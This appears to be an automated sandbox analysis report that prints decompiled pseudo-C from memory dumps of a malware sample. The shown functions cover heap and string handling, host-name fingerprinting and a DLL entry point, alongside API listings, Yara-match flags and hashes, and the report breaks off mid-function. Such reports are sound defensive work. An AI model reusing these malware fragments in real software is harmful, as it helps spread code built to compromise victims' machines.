                                                                                                                                                                                                                                				if(E02B819C5( &_v32,  &_v16,  *0x2b841c0 ^ 0xf7a71548) == 0) {
                                                                                                                                                                                                                                					_t25 = 0xb;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t26 = lstrlenW( *0x2b841b8);
                                                                                                                                                                                                                                					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                                                                                                                					_t30 = E02B81210(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                						_t32 = _v36;
                                                                                                                                                                                                                                						 *_t32 = 0;
                                                                                                                                                                                                                                						if( *0x2b841b8 == 0) {
                                                                                                                                                                                                                                							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							E02B82065(_t44, _t32 + 4);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t25 = E02B81F7C(_v28); // executed
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				ExitThread(_t25);
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2636182767-0
                                                                                                                                                                                                                                • Opcode ID: 6683e059c3efbe1d3f8d0b3ba8ab85e1b1966e121c5dfa80469e523f7baa44d1
                                                                                                                                                                                                                                • Instruction ID: 2e87b4e1c0087b01e3c7400a1b587ec45ad639d149e100e1278ab5035a9cc8f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6683e059c3efbe1d3f8d0b3ba8ab85e1b1966e121c5dfa80469e523f7baa44d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14119D71959206ABD711FB68DC49EAB7BEDEB04744F020896F14DE3190E730E586CB52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BB2DE9), ref: 02BB1020
                                                                                                                                                                                                                                  • Part of subcall function 02BB6B85: SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB1061
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 1811ad19caea02971ac55536571fbc910e58c639858af5c1fde7f73542baa22b
                                                                                                                                                                                                                                • Instruction ID: e9217a03beaaa4f50580b708d9081449cca9aa16b5e1ddc5739111bf4919e891
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1811ad19caea02971ac55536571fbc910e58c639858af5c1fde7f73542baa22b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E901623691010ABFCB12DFA8D804CEF7BB9EF48750B414462F909E7120E7B0DA25CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t26 = __edi;
                                                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					_t27 = E02BB63D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                                						_t24 = _a12 >> 1;
                                                                                                                                                                                                                                						if(_t24 == 0) {
                                                                                                                                                                                                                                							_t27 = 2;
                                                                                                                                                                                                                                							HeapFree( *0x2bbd270, 0, _a4);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t21 = _a4;
                                                                                                                                                                                                                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                                                                                                                							 *_t26 = _t21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					return _t27;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 = E02BB6FA6(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                                                				_t27 = _t22;
                                                                                                                                                                                                                                				if(_t27 == 0) {
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6FA6: SysFreeString.OLEAUT32(00000000), ref: 02BB7009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,02BB296F,?,004F0053,052F9370,00000000,?), ref: 02BB77FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: 8c0cbe8114c307771718755f336dd414f965c0134399083fb5029502b3fd4756
                                                                                                                                                                                                                                • Instruction ID: 058518c75c73cae0f55e128aea4988c071d7449b1d26ac9bc6d995e4eef48eb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c0cbe8114c307771718755f336dd414f965c0134399083fb5029502b3fd4756
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F501EC32500519BBCF239E95CC05EFA7B6AEF44790F048469FE159A520DBB1D960EBD0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02BB508C(void* __ecx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t23 = __imp__;
                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                				_v8 = _v8 & 0;
                                                                                                                                                                                                                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                				_t10 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					_t20 = E02BB5157(_t10 + 1);
                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                						if(_t15 != 0) {
                                                                                                                                                                                                                                							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							E02BB53BB(_t20);
                                                                                                                                                                                                                                							_t20 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BBA5F2,747DF710,00000000,?,?,02BBA5F2), ref: 02BB50A4
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,02BBA5F2,02BBA5F3,?,?,02BBA5F2), ref: 02BB50C1
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 36ee9ce2ad5b09d57e5965b2ea1675b756eb8c5129451a49d4e7d4e7cc78b203
                                                                                                                                                                                                                                • Instruction ID: d14c0acf8d5f2a3e22688f7d202eb8e64c33a8bf04bc490e1f937b057abc6471
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ee9ce2ad5b09d57e5965b2ea1675b756eb8c5129451a49d4e7d4e7cc78b203
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6F05466604109BBEB22D69A8D00FFF76ADDFC5754FA10099B904D7240EAF0DE0587B2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t14 = 1;
                                                                                                                                                                                                                                				_t4 = _a8;
                                                                                                                                                                                                                                				if(_t4 == 0) {
                                                                                                                                                                                                                                					if(InterlockedDecrement(0x2bbd274) == 0) {
                                                                                                                                                                                                                                						E02BB1F47();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t4 == 1 && InterlockedIncrement(0x2bbd274) == 1) {
                                                                                                                                                                                                                                						_t10 = E02BB4D07(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                						if(_t10 != 0) {
                                                                                                                                                                                                                                							_t14 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02BBD274), ref: 02BB597F
                                                                                                                                                                                                                                  • Part of subcall function 02BB4D07: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(02BBD274), ref: 02BB599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: c7023d83d4acb3de88286f9f52f9499dd64a5a114c026c2a1d38f1f55f5f709e
                                                                                                                                                                                                                                • Instruction ID: b4f709fdbb667935da354918d7efa549d0c852010554c08724fcc1dff6db7c7a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7023d83d4acb3de88286f9f52f9499dd64a5a114c026c2a1d38f1f55f5f709e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E04F21684527AF9B335774C908BFAAA51EF0DBA4F824595F6C5D2010C7D0C851CBB3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E02BB6FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v18;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosw");
                                                                                                                                                                                                                                				_t15 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t4 = _t15 + 0x2bbe39c; // 0x52f8944
                                                                                                                                                                                                                                				_t20 = _t4;
                                                                                                                                                                                                                                				_t6 = _t15 + 0x2bbe124; // 0x650047
                                                                                                                                                                                                                                				_t17 = E02BB6B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                				if(_t17 < 0) {
                                                                                                                                                                                                                                					_t23 = _t17;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 = 8;
                                                                                                                                                                                                                                					if(_v20 != _t23) {
                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t19 = E02BBA3CC(_t20, _v12);
                                                                                                                                                                                                                                						if(_t19 != 0) {
                                                                                                                                                                                                                                							 *_a16 = _t19;
                                                                                                                                                                                                                                							_t23 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__#6(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t23;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6B85: SysFreeString.OLEAUT32(?), ref: 02BB6C64
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BB1CB7,004F0053,00000000,?), ref: 02BBA3D5
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BB1CB7,004F0053,00000000,?), ref: 02BBA3FF
                                                                                                                                                                                                                                  • Part of subcall function 02BBA3CC: memset.NTDLL ref: 02BBA413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB7009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 0103568e5381c36554bd568dfc21b971f443c1d94a3ac382b89e0b8b635539ff
                                                                                                                                                                                                                                • Instruction ID: b57f14d570459df545a9a3ca77b46c8c0db026d01c02e124e6db87e54a1048f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0103568e5381c36554bd568dfc21b971f443c1d94a3ac382b89e0b8b635539ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33015E32900119BFDB139FA8CC00DEABBB9EF48350F814866F905A7061EBB1DA11D790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BBAB22() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E02BBABE6(0x2bbc344, 0x2bbd134); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x02bbab19
                                                                                                                                                                                                                                0x02bbab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 02BBAB19
                                                                                                                                                                                                                                  • Part of subcall function 02BBABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BBAC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: d72a85fd755b9e1e4079bcea22f16a7ca5669d9217e3684e09c5baede721516b
                                                                                                                                                                                                                                • Instruction ID: 9aa56b5ae0449548001c2173244ff471c0bf73ab17f23d9c4e5dd2e15303b762
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d72a85fd755b9e1e4079bcea22f16a7ca5669d9217e3684e09c5baede721516b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4B0128276E003BF306791086D13DF70A0FCFC4A20320C4DFF011C4100D4E01C410031
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BBAB07() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E02BBABE6(0x2bbc344, 0x2bbd124); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x02bbab19
                                                                                                                                                                                                                                0x02bbab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 02BBAB19
                                                                                                                                                                                                                                  • Part of subcall function 02BBABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BBAC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 4c521ffc2417ddc60437e0a7a1cb7f43d66b51fb44eb776b505cb14751a0b4e6
                                                                                                                                                                                                                                • Instruction ID: 8c8584441f12f1c22fa54cc4c39a75049e5320fda1ed22ea15ebf285741aabe4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c521ffc2417ddc60437e0a7a1cb7f43d66b51fb44eb776b505cb14751a0b4e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEB0129276C003BF302751046D13CF70A4ECFC0A10320C4DFF011D4000D4E11C410031
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E02B814A8(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				 *0x2b841d0 =  *0x2b841d0 & 0x00000000;
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push(0x2b841cc);
                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                                                				 *0x2b841c8 = 0xc; // executed
                                                                                                                                                                                                                                				L02B81AEC(); // executed
                                                                                                                                                                                                                                				return __eax;
                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(02B81091,00000001,02B841CC,00000000), ref: 02B814C6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3907675253-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB5157(long _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = RtlAllocateHeap( *0x2bbd270, 0, _a4); // executed
                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB9BED(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					return E02BB458D(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t17 = E02BB1007(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t17;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,02BB4A10,3D02BBC0,80000002,02BB51FC,02BB2DE9,74666F53,4D4C4B48,02BB2DE9,?,3D02BBC0,80000002,02BB51FC,?), ref: 02BB9C12
                                                                                                                                                                                                                                  • Part of subcall function 02BB1007: SysAllocString.OLEAUT32(02BB2DE9), ref: 02BB1020
                                                                                                                                                                                                                                  • Part of subcall function 02BB1007: SysFreeString.OLEAUT32(00000000), ref: 02BB1061
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFreelstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3808004451-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E02BB235B(int* __ecx) {
                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				char* _t45;
                                                                                                                                                                                                                                				char* _t46;
                                                                                                                                                                                                                                				char* _t47;
                                                                                                                                                                                                                                				char* _t48;
                                                                                                                                                                                                                                				char* _t49;
                                                                                                                                                                                                                                				char* _t50;
                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                				signed int _t70;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                                                				signed int _t78;
                                                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

